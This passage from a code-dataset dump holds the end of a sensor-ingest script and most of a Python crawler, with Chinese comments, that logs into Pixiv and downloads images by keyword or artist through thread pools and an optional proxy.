update_status(args.sensorid, 'complete')\r\n\r\nif __name__ == \"__main__\":\r\n parser = argparse.ArgumentParser()\r\n parser.add_argument(\"sensorid\", help=\"system sensor id\")\r\n args = parser.parse_args()\r\n logging.basicConfig(filename=\"../logs/{}.log\".format(args.sensorid), level=logging.DEBUG, format=\"%(asctime)s:%(levelname)s:%(message)s\")\r\n try:\r\n process(args.sensorid)\r\n except Exception as e:\r\n update_status(args.sensorid, 'error')\r\n logging.critical(str(e)) \r\n raise \r\n","sub_path":"src/app/ingest/ingest.py","file_name":"ingest.py","file_ext":"py","file_size_in_byte":27843,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"13"} +{"seq_id":"278291119","text":"#coding=utf-8\n#! /usr/bin/env python\nimport requests,http,urllib\nimport sys,os,time\nimport re,pickle\nimport inspect\nimport signal\n\nimport myEnum\nimport threadPool\nimport pString\nimport makeLog\n\n\n#TODO:\timport bookmark [http://www.pixiv.net/bookmark.php?type=user&rest=show&p=%d](test/bookmark.html)\n\n\nproxies = {}\n#使用的代理\nuse_proxies = {\n\t\t\t\"http\": \"http://139.129.128.134:3128\",\n\t\t\t\"https\": \"http://139.129.128.134:3128\",\n\t\t\t}\n#是否使用代理下载(而不只是查询),因为下载图片和网页展示是不同的服务器\ndown_by_proxies = False\n#默认下载地址\ndefaultDir = r\"D:/图片/pixiv/\"\n#默认图片下载线程数,过大可能会被网站丢包\ndownThread = 16\n#用户配置文件\nuserFile = \"userFile.pickle\"\n#find时将每多少页为一个单元检测\nfind_gap = 5\n#等待间隔\nwait_gap = 2.5\n#\ndown_all = True\n\ndef getFuncName():\n\treturn inspect.stack()[1][3]\n#创建文件需要的父文件夹(们)\ndef createFile(filename):\n\tdirectory = \"\"\n\tname = \"\"\n\tfor c in filename:\n\t\tif c == '/':\n\t\t\tdirectory = name\n\t\tname += c\n\tif directory != \"\":\n\t\tif os.path.isdir(directory):\n\t\t\tpass\n\t\telse:\n\t\t\tos.makedirs(directory)\n#设置访问用http头\ndef makeHeader(url):\n\theaders = {\n\t'Referer': url\n\t}\n\treturn headers\n#定制下载用http头\ndef makeHeaderDown(url):\n\theaders = {\n\t'Range': 'bytes=0-99999999',\n\t'Referer': url,\n\t'Cache-Control':'max-age=0',\n\t'DNT':'1',\n\t'Connection':'keep-alive'\n\t}\n\treturn headers\n#判断文件是否已经存在并有意义\ndef fileExist(filename):\n\tif os.path.exists(filename) and os.path.getsize(filename) != 0:\n\t\treturn True\n\telse:\n\t\treturn False\n\n#用户信息存储类\nclass User:\n\tusername = ''\n\tpassword = ''\n\tfilename = ''\n\t#构造函数\n\tdef __init__(self, fname):\n\t\tself.filename = fname\n\t\tif os.path.exists(self.filename):\n\t\t\tself.__load()\n\t\telse:\n\t\t\tself.stdio()\n\t#读入\n\tdef __load(self):\n\t\tfd = open(self.filename, \"rb\")\n\t\tself.username = pickle.load(fd)\n\t\tself.password = pickle.load(fd)\n\t\tself.filename = pickle.load(fd)\n\t\tfd.close()\n\t\tprint(\"从文件中读入用户名和密码成功!\")\n\t#写入\n\tdef __dump(self):\n\t\tfd = open(self.filename, \"wb\")\n\t\tpickle.dump(self.username,fd)\n\t\tpickle.dump(self.password,fd)\n\t\tpickle.dump(self.filename,fd)\n\t\tfd.close()\n\t#从标准输入获得值\n\tdef stdio(self):\n\t\tself.username = input(\"username:\")\n\t\tself.password = input(\"password:\")\n\t\tself.__dump()\n#自定义错误,参数错误\nclass ParameterError(Exception):\n\tdef __init__(self, msg):\n\t\tException.__init__(self)\n\t\tself.message = msg\n\tdef __str__(self):\n\t\treturn str(self.message)\n#主功能类\nclass Spider:\n\t#构造函数\n\tdef __init__(self,logdir = \"lg\",prwork = True, prdown = True):\n\t\tself.__session = requests.session()\n\t\t#线程池\n\t\tself.__pool = {}\n\t\tself.__pool['find'] = threadPool.Pool(32)\n\t\tself.__pool['get'] = threadPool.Pool(16)\n\t\tself.__pool['down'] = threadPool.Pool(downThread)\n\t\tself.__pool['write'] = threadPool.Pool(128)\n\t\t#线程池使用的参数列表\n\t\tself.poolpara = {}\n\t\tself.poolpara['find'] = ['key','pageid','logfd']\n\t\tself.poolpara['get'] = ['id', 'adir', 'logfd']\n\t\tself.poolpara['down'] = ['id', 'url[]', 'refer[]', 'filename[]', 'logfd']\n\t\tself.poolpara['write'] = ['id', 'res[]', 'filename[]', 'logfd']\n\t\t#画师记录\n\t\tself.person = {}\n\t\tpass\n\t#登录\n\tdef login(self, user):\n\t\t#定义post的参数\n\t\treqdata={\n\t\t'mode':'login',\n\t\t'pass':user.password,\n\t\t'pixiv_id':user.username,\n\t\t'skip':'1'\n\t\t}\n\t\t#domain = r\"https://www.secure.pixiv.net/login.php\"\n\t\tdomain = r\"https://www.pixiv.net/login.php\"\n\t\tresponse = self.__session.post(domain, data = reqdata, proxies = proxies)\n\t\t#print(\"response\")\n\t\t#print(response)\n\t\t#判断是否登陆成功\n\t\tret = response.text.find(\"var user_id\") != -1\n\t\t#print(\"ret\");\n\t\t#print(ret);\n\t\treturn ret\n\t#登出\n\tdef logout(self):\n\t\tpass\n\t#从地址获取获取内容\n\tdef getHtml(self, domain, stream = False, timeout = 12.05, headers = None, retry = False, needLogin = True):\n\t\tcount = 0\n\t\tif needLogin == True:\n\t\t\treq = self.__session\n\t\telse:\n\t\t\treq = requests\n\t\twhile True:\n\t\t\tcount += 1\n\t\t\ttry:\n\t\t\t\tif headers:\n\t\t\t\t\tret = req.get(domain, stream = stream, headers = headers, proxies = proxies, timeout = timeout)\n\t\t\t\telse:\n\t\t\t\t\tret = req.get(domain, stream = stream, proxies = proxies, timeout = timeout)\n\t\t\t\t#data = \"%s %s\\n%\"(domain, ret.status_code)\n\t\t\t\t#with open(\"developer/getHtml.txt\",\"ab\") as fd:\n\t\t\t\t#\tfd.write(bytes(data, encoding = \"utf8\"))\n\t\t\t\tretlen = len(ret.content)\n\t\t\t\t#HTTP返回值错误\n\t\t\t\tif ret.status_code != 200:\n\t\t\t\t\tprint(domain,flush = True, end = \" \")\n\t\t\t\t\tprint(ret.status_code,flush = True)\n\t\t\t\t\tif ret.status_code in [404,403]:\n\t\t\t\t\t\tif retry: continue\n\t\t\t\t\t\tif count > 2:\n\t\t\t\t\t\t\tprint(\"ret None\",flush = True)\n\t\t\t\t\t\t\treturn None\n\t\t\t\t\t#print(ret.text)\n\t\t\t\t\ttime.sleep(2)\n\t\t\t\t\tcontinue\n\t\t\t\t#数据长度不一致错误\n\t\t\t\treqlen = ret.headers.get('Content-Length')\n\t\t\t\tif reqlen != None and retlen < int(reqlen):\n\t\t\t\t\tprint(\"Length Inconsistency\",flush = True);\n\t\t\t\t\tprint(\"domain: \",domain,flush = True)\n\t\t\t\t\tprint(reqlen,flush = True)\n\t\t\t\t\tprint(retlen,flush = True)\n\t\t\t\t\tprint(\"retry\",flush = True)\n\t\t\t\t\ttime.sleep(2)\n\t\t\t\t\tcontinue\n\t\t\t\t#print(ret.headers['Content-Length'])\n\t\t\t\treturn ret\n\t\t\texcept Exception as e:\n\t\t\t\t#为网络错误预留\n\t\t\t\tprint(\"domain: \",domain,flush = True)\n\t\t\t\tprint(e,flush = True)\n\t\t\t\tprint(\"retry\",flush = True)\n\t\t\t\tprint(inspect.stack()[1][3])\n\t\t\t\ttimeout *= 2\n\t\t\t\ttime.sleep(2)\n\t\t\t\tpass\n\t#获取cookies\n\tdef getcookies(self, domain = r\"\"):\n\t\tresponse = self.getHtml(domain)\n\t\treturn response.cookies.get_dict()\n\t#计数函数\n\tdef recount(self):\n\t\tself.__cnt = 0\n\tdef __count(self, num = 1):\n\t\tself.__cnt += num\n\tdef count(self):\n\t\treturn self.__cnt\n\t#添加任务\n\tdef add_job(self, pname, *args):\n\t\tif not pname in self.__pool:\n\t\t\traise ParameterError(\"%s为不存在的线程池\"%pname)\n\t\tif len(args) != len(self.poolpara[pname]):\n\t\t\terrmsg = \"add_job [%s] 的额外参数应为%d个 %s : %s\"%\\\n\t\t\t(pname, len(self.poolpara[pname]), self.poolpara[pname], args)\n\t\t\tParameterError(errmsg)\n\t\tif pname == \"find\":\n\t\t\tself.__pool[pname].add_job(self.findT, args[0], args[1], args[2])\n\t\telif pname == \"get\":\n\t\t\tself.__pool[pname].add_job(self.getT, args[0], args[1], args[2])\n\t\telif pname == \"down\":\n\t\t\tself.__pool[pname].add_job(self.downT, args[0], args[1], args[2], args[3], args[4])\n\t\telif pname == \"write\":\n\t\t\tself.__pool[pname].add_job(self.writeT, args[0], args[1], args[2], args[3])\n\t#设置线程池的状态参数\n\tdef set_stat(self, pname, name, value):\n\t\tif not pname in self.__pool:\n\t\t\traise ParameterError(\"%s为不存在的线程池\"%pname)\n\t\tself.__pool[pname].set(name, value)\n\t#获取线程池的状态参数\n\tdef get_stat(self, pname, name):\n\t\tif not pname in self.__pool:\n\t\t\traise ParameterError(\"%s为不存在的线程池\"%pname)\n\t\tret = self.__pool[pname].get(name)\n\t\treturn ret\n\t#等待下载任务结束\n\tdef wait_allcomplete(self, data = \"\"):\n\t\tglobal wait_gap\n\t\t#time.sleep(1.5)\n\t\twhile True:\n\t\t\tsize = 0\n\t\t\tret = \"\\t\\t\"\n\t\t\tretqueue = \"\\t\\t\\t\"\n\t\t\tlt = ['find','get','down','write']\n\t\t\tfor poolId in lt:\n\t\t\t\ts = self.__pool[poolId].getSize()\n\t\t\t\t#squeue = self.__pool[poolId].getQsize()\n\t\t\t\tret += \"%s %7s\\t\"%(str(poolId), str(s))\n\t\t\t\t#retqueue += \"%7s\\t\"%(str(squeue))\n\t\t\t\tsize += s\n\t\t\t\t#if s == 1:\n\t\t\t\t#\tself.__pool[poolId].getLast()\n\t\t\tprint(ret, flush = True)\n\t\t\t#print(retqueue, flush = True)\n\t\t\tif size == 0:\n\t\t\t\tbreak\n\t\t\ttime.sleep(wait_gap)\n\t\tprint(data, flush = True)\n\t#从关键字和页码中获取内容,写入日志文件logfd\n\tdef find(self, key, pageid, logfd, mutex = None):\n\t\tdomain = r\"http://www.pixiv.net/search.php?word=%s&order=date_d&p=%d\"%(key,pageid)\n\t\tenum = 0\n\t\tnum = 0\n\t\tres = self.getHtml(domain)\n\t\tif res:\n\t\t\thtml = res.text\n\t\telse:\n\t\t\treturn True\n\t\t#if pString.isNoItem(html):\n\t\t\t#print(key,pageid,logfd,domain)\n\t\t#\tsys.exit()\n\t\t#\treturn False\n\t\tilist = pString.getIidByFind(html)\n\t\tif len(ilist) == 0:\n\t\t\treturn False\n\t\tfor iid in ilist:\n\t\t\tif iid == \"\":\n\t\t\t\t#print(domain,\"HAS null iid\")\n\t\t\t\tcontinue\n\t\t\tenum += logfd.begin(iid + '_0')\n\t\t\tnum += 1\n\t\t#print(domain,num,enum)\n\t\tif enum == num:\n\t\t\treturn False\n\t\t#print(enum, num, pageid)\n\t\treturn True\n\tdef findT(self, args, mutex):\n\t\treturn self.find(args[0], args[1], args[2], mutex)\n\t#从图片id中获取图像下载信息\n\tdef get(self, iid, adir,logfd, mutex = None):\n\t\turl = self.getIid(iid)\n\t\tif url == []:\n\t\t\tlogfd.work(iid + '_' + str(0), [])\n\t\t\treturn True\n\t\tif len(url)>1:\n\t\t\tadir += 'pixiv%s/'%iid\n\t\t\tcreateFile(adir)\n\t\t#相册的处理\n\t\tfor i in range(len(url)):\n\t\t\tfilename = adir + 'pixiv%s%s%s'%\\\n\t\t\t(iid, '' if len(url) == 1 else (\"_\" + str(i)), pString.getSuffix(url[i]))\n\t\t\tif not fileExist(filename):\n\t\t\t\tself.__count()\n\t\t\tret = []\n\t\t\tret.append(url[i])\n\t\t\tret.append(self.getDomain(iid))\n\t\t\tret.append(filename)\n\t\t\tlogfd.work(iid + '_' + str(i), ret)\n\t\treturn True\n\tdef getT(self, args, mutex):\n\t\treturn self.get(args[0], args[1], args[2], mutex)\n\t#下载\n\tdef down(self, iid, url, refer, filename, logfd, mutex = None):\n\t\tif filename == None or fileExist(filename):\n\t\t\tself.add_job('write', iid, None, filename, logfd)\n\t\t\treturn True\n\t\tresponse = self.getHtml(url, stream = True, headers = makeHeader(refer), needLogin = False)\n\t\tif mutex: mutex.acquire()\n\t\tcreateFile(filename)\n\t\tself.add_job('write', iid, response, filename, logfd)\n\t\tif mutex: mutex.release()\n\t\treturn True\n\tdef downT(self, args, mutex):\n\t\treturn self.down(args[0], args[1], args[2], args[3], args[4], mutex)\n\t#写入文件\n\tdef write(self, iid, res, filename, logfd, mutex = None):\n\t\t#为句柄错误预留\n\t\t#if mutex: mutex.acquire()\n\t\tif res == None:\n\t\t\tlogfd.end(iid)\n\t\t\treturn True\n\t\twith open(filename, \"wb\") as fd:\n\t\t\tfd.write(res.content)\n\t\t\tfd.flush()\n\t\t#if mutex: mutex.release()\n\t\tlogfd.end(iid)\n\t\treturn True\n\tdef writeT(self, args, mutex):\n\t\treturn self.write(args[0], args[1], args[2], args[3], mutex)\n\t#从图片id获取图片地址\n\tdef getDomain(self, iid, mode = 'medium'):\n\t\tdomain = r\"http://www.pixiv.net/member_illust.php?mode=%s&illust_id=%s\"%(mode,iid)\n\t\treturn domain\n\t#从图片id中获取图片下载地址\n\tdef getIid(self, iid):\n\t\tdomain = self.getDomain(iid)\n\t\tres = self.getHtml(domain, timeout = 30.05)\n\t\tif not res:\n\t\t\treturn []\n\t\thtml = res.text\n\t\tbig = pString.getBig(html)\n\t\t#如果是mode=big的图片\n\t\tif len(big) !=0:\n\t\t\tbigD = self.getDomain(big[0],'big')\n\t\t\thtml = self.getHtml(bigD, headers = makeHeader(domain), timeout = 30.05).text\n\t\t\tret = pString.getBigPic(html)\n\t\t\treturn ret\n\t\telse:\n\t\t\tmg = pString.getManga(html)\n\t\t\t#如果是mode=manga类型的图片\n\t\t\tif len(mg) != 0:\n\t\t\t\tdomain = self.getDomain(mg[0],'manga')\n\t\t\t\thtml = self.getHtml(domain, timeout = 30.05).text\n\t\t\t\tret = pString.getMangaPic(html)\n\t\t\t\tpagelen = len(ret)\n\t\t\t\tret = []\n\t\t\t\tfor i in range(pagelen):\n\t\t\t\t\tmangaD = self.getDomain(mg[0],'manga_big')+\"&page=%d\"%i\n\t\t\t\t\thtml = self.getHtml(mangaD, timeout = 30.05).text\n\t\t\t\t\turl = pString.getBigPic(html)\n\t\t\t\t\tret.append(url[0])\n\t\t\t\treturn ret\n\t\t\t#普通的单张图片\n\t\t\telse:\n\t\t\t\tret = pString.getPic(html)\n\t\t\t\treturn ret\n\t#为按照画师下载预留\n\tdef getPid(self):\n\t\tpass\n\tdef getNameByPid(self, pid):\n\t\tif pid in self.person:\n\t\t\treturn self.person[pid]\n\t\tdomain = \"http://www.pixiv.net/member.php?id=%s\"%pid\n\t\thtml = self.getHtml(domain)\n\t\tif not html:\n\t\t\treturn None\n\t\tpname = pString.getPname(html.text)\n\t\tself.person[pid] = pname\n\t\treturn pname\n#包装好的命令行操作, cFunc系列应该写入底层\nclass SpiderCmd(Spider):\n\t#构造函数\n\tdef __init__(self):\n\t\tsuper(SpiderCmd, self).__init__()\n\t\tself.log = makeLog.mainLog()\n\t\tself.flag_login = False\n\t#登录\n\tdef clogin(self):\n\t\tglobal userFile\n\t\twhile True:\n\t\t\tuser = User(userFile)\n\t\t\tprint(\"登录中...\", flush = True)\n\t\t\tif self.login(user):\n\t\t\t\tprint(\"登陆成功!\\n\", flush = True)\n\t\t\t\tbreak\n\t\t\telse:\n\t\t\t\tprint(\"登录失败!\\n\", flush = True)\n\t\t\tif os.path.exists(\"userFile.pickle\"):\n\t\t\t\tos.remove(\"userFile.pickle\")\n\t\tself.flag_login = True\n\t#获取一个条目的id\n\tdef oFind(self, key, wait = True):\n\t\tglobal find_gap\n\t\tglobal proxies\n\t\tproxies = use_proxies\n\t\tif not self.flag_login: self.clogin()\n\t\tlogfd = self.log.getLog(key)\n\t\ttags = self.log.getTag(key)\n\t\tprint(\"查询 条目 [%s] 开 始:\"%(key), flush = True)\n\t\tfor tag in tags:\n\t\t\tself.set_stat('find', 'flag', True)\n\t\t\tpageid = 1\n\t\t\tprint(\"\\t查询 条目 [%s] 关键词 [%s] 开始\"%(key, tag), flush = True)\n\t\t\twhile self.get_stat('find', 'flag'):\n\t\t\t\tif pageid >= 1000:\n\t\t\t\t\tbreak\n\t\t\t\tprint(\"\\t\\t查询 条目 [%s] 关键词 [%s] 前 %s 页开始\"%(key, tag, pageid-1+find_gap), flush = True)\n\t\t\t\tfor i in range(find_gap):\n\t\t\t\t\tp = pageid + i\n\t\t\t\t\tself.add_job('find', tag, p, logfd)\n\t\t\t\tpageid += find_gap\n\t\t\t\tif wait:\n\t\t\t\t\tself.wait_allcomplete(\"\\t\\t查询 条目 [%s] 关键词 [%s] 前 %s 页完成\"%(key, tag, pageid-1))\n\t\t\tprint(\"\\t查询 条目 [%s] 关键词 [%s] 完成\"%(key, tag), flush = True)\n\t\tprint(\"查询 条目 [%s] 完 成.\\n\"%(key), flush = True)\n\t#获取一个条目下载地址\n\tdef oGet(self, key, wait = False, isP = False):\n\t\tif not self.flag_login: self.clogin()\n\t\tif(\"画师\" in key):\n\t\t\t#print(key)\n\t\t\tpid = key[3:-1]\n\t\t\tpname = self.getNameByPid(pid)\n\t\t\tif not pname:\n\t\t\t\tprint(\"\\t[%s] 用户已经不存在\"%pid, flush = True);\n\t\t\t\treturn\n\t\t\t#print(pid,pname)\n\t\t\t#input()\n\t\tif isP:\n\t\t\tadir = defaultDir + '_画师/' + pString.checkDirName(key[2:] + pname) + '/'\n\t\telse:\n\t\t\tadir = defaultDir + pString.checkDirName(key) + '/'\n\t\tlogfd = self.log.getLog(key)\n\t\tiidlist = logfd.get()\n\t\tlocallist = []\n\t\tprint(\"\\t[%s] 开始获取下载地址\"%key, flush = True)\n\t\tfor iid in iidlist:\n\t\t\tlocallist.append(iid)\n\t\tfor iid in locallist:\n\t\t\tself.add_job('get', iid[:-2], adir, logfd)\n\t\tif wait:\n\t\t\tprint(\"\\t\\t等待获取完成:\", flush = True)\n\t\t\tself.wait_allcomplete(\"\\t[%s] 获取下载地址完成\"%key)\n\t#下载一个条目的图片\n\tdef oDown(self, key, wait = True):\n\t\t#if not self.flag_login: self.clogin()\n\t\tlogfd = self.log.getLog(key)\n\t\tddict = logfd.getDown()\n\t\t#使用深复制\n\t\tlocaldict = {}\n\t\tfor iid in ddict:\n\t\t\tlocaldict[iid] = ddict[iid]\n\t\tmsg = key\n\t\t\"\"\"\n\t\tif(\"画师\" in key):\n\t\t\tpid = key[3:-1]\n\t\t\tpname = self.getNameByPid(pid)\n\t\t\tif not pname:\n\t\t\t\tprint(\"\\t[%s] 用户已经不存在\"%pid);\n\t\t\t\treturn\n\t\t\tmsg += pname\n\t\t\"\"\"\n\t\tprint(\"\\t%s 开始下载:\"%msg, flush = True)\n\t\tfor iid in localdict:\n\t\t\td = localdict[iid]\n\t\t\tif len(d)!=0:\n\t\t\t\turl = d[0]\n\t\t\t\trefer = d[1]\n\t\t\t\tfilename = d[2]\n\t\t\telse:\n\t\t\t\turl,refer,filename = None,None,None\n\t\t\tself.add_job('down', iid, url, refer, filename, logfd)\n\t\tif wait:\n\t\t\tprint(\"\\t\\t等待下载完成:\", flush = True)\n\t\t\tself.wait_allcomplete(\"\\t%s 下载完成\"%msg)\n\t#为画师设计的查询功能\n\tdef pFind(self, pid, wait = True):\n\t\t#print(pid)\n\t\tif not self.flag_login: self.clogin()\n\t\tpname = self.getNameByPid(pid)\n\t\tif not pname:\n\t\t\tprint(\"\\t[%s] 用户已经不存在\"%pid, flush = True);\n\t\t\treturn\n\t\tkey = \"画师[%s]\"%(pid)\n\t\tfullkey = \"画师[%s]%s\"%(pid, pname)\n\t\tfilename = pString.checkDirName(key)\n\t\tlogfd = self.log.getLog(key)\n\t\t#\n\t\tprint(\"画师 [%s]%s 作品遍历开始\"%(pid,pname), flush = True)\n\t\tpageid = 1\n\t\teflag = True\n\t\twhile eflag:\n\t\t\tdomain = \"http://www.pixiv.net/member_illust.php?id=%s&type=all&p=%d\"%(pid,pageid)\n\t\t\thtml = self.getHtml(domain)\n\t\t\tif not html:\n\t\t\t\tbreak\n\t\t\tif pString.isNullInPerson(html.text):\n\t\t\t\tbreak\n\t\t\tiidlist = pString.getIidByPerson(html.text)\n\t\t\t#print(domain,iidlist)\n\t\t\tif len(iidlist) == 0:\n\t\t\t\tbreak\n\t\t\tfor iid in iidlist:\n\t\t\t\tif logfd.begin(iid + '_0'):\n\t\t\t\t\teflag = False\n\t\t\tif eflag:\n\t\t\t\tprint(\"\\t画师 [%s]%s 作品前%d页遍历完成\"%(pid,pname,pageid), flush = True)\n\t\t\tpageid += 1\n\t\tprint(\" [%s]%s 作品遍历完成\"%(pid,pname), flush = True)\n\t#获取所有图片id\n\tdef cFind(self):\n\t\tglobal proxies\n\t\tproxies = use_proxies\n\t\tglobal find_gap\n\t\tprint(proxies, flush = True)\n\t\tif not self.flag_login: self.clogin()\n\t\tprint(\"开始查询待下载作品:\", flush = True)\n\t\tkeylist = self.log.getName()\n\t\tif \"画师\" in keylist:\n\t\t\tpidlist = self.log.getTag(\"画师\")\n\t\t\tfor pid in pidlist:\n\t\t\t\tself.pFind(pid)\n\t\tfor key in keylist:\n\t\t\tif key != \"画师\":\n\t\t\t\tself.oFind(key)\n\t\tprint(\"待下载作品查询完毕.\", flush = True)\n\t#获取所有下载地址\n\tdef cGet(self):\n\t\tglobal proxies\n\t\tproxies = use_proxies\n\t\tif not self.flag_login: self.clogin()\n\t\tkeylist = self.log.getName()\n\t\tprint(\"获取全部作品下载地址:\", flush = True)\n\t\tfor key in keylist:\n\t\t\tif key != \"画师\":\n\t\t\t\tself.oGet(key)\n\t\t\telse:\n\t\t\t\tpidlist = self.log.getTag(key)\n\t\t\t\tfor pid in pidlist:\n\t\t\t\t\tpname = self.getNameByPid(pid)\n\t\t\t\t\tif not pname:\n\t\t\t\t\t\tprint(\"\\t[%s] 用户已经不存在\"%pid, flush = True);\n\t\t\t\t\t\tcontinue\n\t\t\t\t\tkey = \"画师[%s]\"%(pid)\n\t\t\t\t\tfullkey = \"画师[%s]%s\"%(pid, pname)\n\t\t\t\t\tfilename = pString.checkDirName(key)\n\t\t\t\t\tself.oGet(filename, isP = True)\n\t\tprint(\"\\t\\t等待获取完成:\", flush = True)\n\t\tself.wait_allcomplete(\"获取下载地址完成.\\n\")\n\t#下载图片\n\tdef cDown(self):\n\t\tglobal proxies\n\t\tif not down_by_proxies:\n\t\t\tproxies = {}\n\t\t#if not self.flag_login: self.clogin()\n\t\tkeylist = self.log.getName()\n\t\tprint(\"开始下载全部作品:\", flush = True)\n\t\tfor key in keylist:\n\t\t\tif key != \"画师\":\n\t\t\t\tself.oDown(key)\n\t\t\telse:\n\t\t\t\tpidlist = self.log.getTag(key)\n\t\t\t\tfor pid in pidlist:\n\t\t\t\t\t#pname = self.getNameByPid(pid)\n\t\t\t\t\t#if not pname:\n\t\t\t\t\t#\tprint(\"\\t[%s] 用户已经不存在\"%pid);\n\t\t\t\t\t#\tcontinue\n\t\t\t\t\tkey = \"画师[%s]\"%(pid)\n\t\t\t\t\t#fullkey = \"画师[%s]%s\"%(pid, pname)\n\t\t\t\t\tfilename = pString.checkDirName(key)\n\t\t\t\t\tself.oDown(filename)\n\t\tprint(\"全部作品下载完成.\", flush = True)\n\t#一个工作进程\n\tdef work(self):\n\t\tself.recount()\n\t\tself.cFind()\n\t\tself.cGet()\n\t\tself.cDown()\n\tdef work_get(self):\n\t\tself.recount()\n\t\tself.cGet()\n\tdef work_down(self):\n\t\tself.recount()\n\t\tself.cDown()\n\t#\n\tdef work_one(self, key):\n\t\tkdict = self.log.getName()\n\t\tif key == \"画师\":\n\t\t\tself.recount()\n\t\t\tpidlist = self.log.getTag(key)\n\t\t\tfor pid in pidlist:\n\t\t\t\tself.pFind(pid)\n\t\t\tfor pid in pidlist:\n\t\t\t\tpname = self.getNameByPid(pid)\n\t\t\t\tif not pname:\n\t\t\t\t\tprint(\"\\t[%s] 用户已经不存在\"%pid, flush = True);\n\t\t\t\t\tcontinue\n\t\t\t\tkey = \"画师[%s]\"%(pid)\n\t\t\t\tfullkey = \"画师[%s]%s\"%(pid, pname)\n\t\t\t\tfilename = pString.checkDirName(key)\n\t\t\t\tself.oGet(filename, wait = True, isP = True)\n\t\t\t#print(\"\\t\\t等待获取完成:\")\n\t\t\t#self.wait_allcomplete(\"获取下载地址完成.\\n\")\n\t\t\tfor pid in pidlist:\n\t\t\t\tpname = self.getNameByPid(pid)\n\t\t\t\tif not pname:\n\t\t\t\t\tprint(\"\\t[%s] 用户已经不存在\"%pid, flush = True);\n\t\t\t\t\tcontinue\n\t\t\t\tkey = \"画师[%s]\"%(pid)\n\t\t\t\tfullkey = \"画师[%s]%s\"%(pid, pname)\n\t\t\t\tfilename = pString.checkDirName(key)\n\t\t\t\tself.oDown(filename)\n\t\t\treturn\n\t\tif not key in kdict:\n\t\t\tprint(\"条目名 %s 不在条目表中\"%(key), flush = True)\n\t\t\treturn\n\t\tself.recount()\n\t\tself.oFind(key)\n\t\tself.oGet(key, wait = \"True\")\n\t\tself.oDown(key)\n\tdef work_some(self):\n\t\tmsg = \"\\t输入条目名,选择要下载的条目。用空格分隔\\n\\t\"\n\t\tkeylist = input(msg)\n\t\tkeylist = keylist.split(' ')\n\t\tfor key in keylist:\n\t\t\tif key != \"\":\n\t\t\t\tself.work_one(key)\n\t\tprint()\n\t#添加条目\n\tdef add(self):\n\t\tmsg = \"输入一个图片条目,按照如下格式\\n\\\n\t\t\\t条目名称 关键字1 关键字2 ....\\n关键字和条目间用空格隔开\\n\"\n\t\tdata = input(msg)\n\t\tif data[0:2] == \"画师\":\n\t\t\tprint(\"`画师`为关键字不允许使用\", flush = True)\n\t\t\treturn\n\t\tck = data.split(' ')\n\t\tfor c in ck:\n\t\t\tif c == '' or c == ' ':\n\t\t\t\tprint(\"输入格式不正确: 多余的空格或占位符\", flush = True)\n\t\t\t\treturn\n\t\tself.log.append(data)\n\t#删除条目\n\tdef remove(self):\n\t\tmsg = \"请输入需要删除的条目名称:\\n\\t\"\n\t\tdata = input(msg)\n\t\tif data[0:2] == \"画师\":\n\t\t\tprint(\"`画师`为关键字不允许使用\", flush = True)\n\t\t\treturn\n\t\ttry:\n\t\t\tself.log.delete(data)\n\t\t\tprint(\"删除成功!\\n\", flush = True)\n\t\texcept Exception as e:\n\t\t\tprint(e, flush = True)\n\tdef addP(self):\n\t\tmsg = \"输入添加的画师的id,用空格分隔:\\n\\t\"\n\t\tdata = input(msg)\n\t\tck = data.split(' ')\n\t\tfor c in ck:\n\t\t\tif c in ['\\n','\\r','\\t','\\v',' ']:\n\t\t\t\tcontinue\n\t\t\tif not c.isdigit():\n\t\t\t\tprint(\"输入格式不正确: 不是数字\", flush = True)\n\t\t\t\treturn\n\t\tself.log.append(\"画师\"+\" \"+data)\n\tdef removeP(self):\n\t\tmsg = \"请输入需要删除的画师id:\\n\\t\"\n\t\tdata = input(msg)\n\t\ttry:\n\t\t\tself.log.delete(\"画师\"+\" \"+data)\n\t\t\tprint(\"删除成功!\\n\", flush = True)\n\t\texcept Exception as e:\n\t\t\tprint(e, flush = True)\n\tdef importP(self):\n\t\tglobal proxies\n\t\tproxies = use_proxies\n\t\tif not self.flag_login: self.clogin()\n\t\t#\n\t\ttags = self.log.getTag(\"画师\")\n\t\tpageid = 1\n\t\teflag = True\n\t\twhile eflag:\n\t\t\tdomain = \"http://www.pixiv.net/bookmark.php?type=user&rest=show&p=%d\"%(pageid)\n\t\t\thtml = self.getHtml(domain)\n\t\t\tif not html:\n\t\t\t\tbreak\n\t\t\tif pString.isNullInBookmark(html.text):\n\t\t\t\tbreak\n\t\t\tiidlist = pString.getIidByBookmark(html.text)\n\t\t\t#print(domain,iidlist)\n\t\t\tif len(iidlist) == 0:\n\t\t\t\tbreak\n\t\t\teflag = False\n\t\t\tfor iid in iidlist:\n\t\t\t\tif not iid in tags:\n\t\t\t\t\teflag = True\n\t\t\tdata = ' '.join(iidlist)\n\t\t\t#print(data)\n\t\t\tif eflag:\n\t\t\t\tself.log.append(\"画师\"+\" \"+data)\n\t\t\tprint(\"\\t关注列表第%d页遍历完成\"%(pageid), flush = True)\n\t\t\tpageid += 1\n\t\tprint(\"关注列表遍历完成\", flush = True)\n\t#输出所有条目\n\tdef prspace(self, s):\n\t\tc = [chr(i) for i in range(0,255)]\n\t\tret = 20\n\t\tfor i in s:\n\t\t\tret -= 1 if i in c else 2\n\t\treturn ret\n\tdef prtag(self):\n\t\tnamelist = self.log.getName()\n\t\tnamelist.sort()\n\t\tif '画师' in namelist:\n\t\t\tnamelist.remove('画师')\n\t\t\tnamelist.append('画师')\n\t\tprint(\"%s %s\\t['%s']\"%('序号', '条目名'+(17*' '),'关键字'), flush = True)\n\t\tfor index,name in enumerate(namelist):\n\t\t\ttags = self.log.getTag(name)\n\t\t\ttags.sort()\n\t\t\tprint(\"%4d %s\\t\"%(index, name+' '*self.prspace(name)), end = \"\", flush = True)\n\t\t\tfor tag in tags:\n\t\t\t\tprint(repr(tag), end = \" \", flush = True)\n\t\t\t\ttime.sleep(0.01)\n\t\t\tprint()\n#命令行交互控制器\ndef controller():\n\twork = SpiderCmd()\n\twhile True:\n\t\tprint(\"程序首页\", flush = True)\n\t\tprint(\"当前存在条目:\", flush = True)\n\t\tmsg = 